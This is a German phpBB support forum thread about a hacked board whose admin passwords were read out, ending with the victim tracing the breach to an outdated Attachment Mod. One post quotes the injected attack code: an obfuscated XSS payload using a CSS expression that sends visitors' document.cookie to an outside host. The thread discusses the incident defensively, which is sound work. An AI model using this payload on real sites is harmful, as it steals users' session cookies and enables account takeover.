Gehackt + Passwoerter ausgelesen! Wie?

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Wissler
Mitglied

Beitrag von Wissler »

daruler hat geschrieben: Auf welchen schadcode?
Na, den hier:

Code: Alles auswählen

<B C=">" ''style='font-size:0;color:#EFEFEF'style='top :expression(eval(this.sss));'sss=`i=new/**/Image( );i.src='http://mouze.org/bin/c.php?c='+document .cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
larsneo
Mitglied
Beitrag von larsneo »

yep. dazu dann noch die logfiles der zugriffe auswerten und juristische schritte einleiten. nachdem der angriff ja zur abwechslung einmal nicht automatisiert über irgendwelche anonymen brasilianischen proxies sondern gezielt von einem script kiddie durchgeführt wurde, hast du da unter umständen sogar ganz gute chancen.
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
daruler
Mitglied
Beitrag von daruler »

Ich glaube kaum, dass ich rechtliche Schritte einleiten werde, da ich den "Hacker" kenne und er auch fast keinen Schaden angerichtet hat.

Ich glaube jedoch zu wissen wie der Hacker an die Passwoerter herankam:

http://www.phpbb.de/viewtopic.php?t=85972

Hallo,

der Fall hat sich geklärt. Es handelt sich nicht um einen Bug in Hotchis Download Mod, sondern um eine alte Version des Attachment Mods.

Es gibt nämlich 2 Dateien die ähnlich lauten: download.php und downloads.php

Ich habe (hatte) noch eine alte Version des Attachment Mods laufen, was ich nun korrigiert habe. Durch die alte Version des Attachment-Mods konnte der Hacker Zugriff auf mein Passwort bekommen.
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“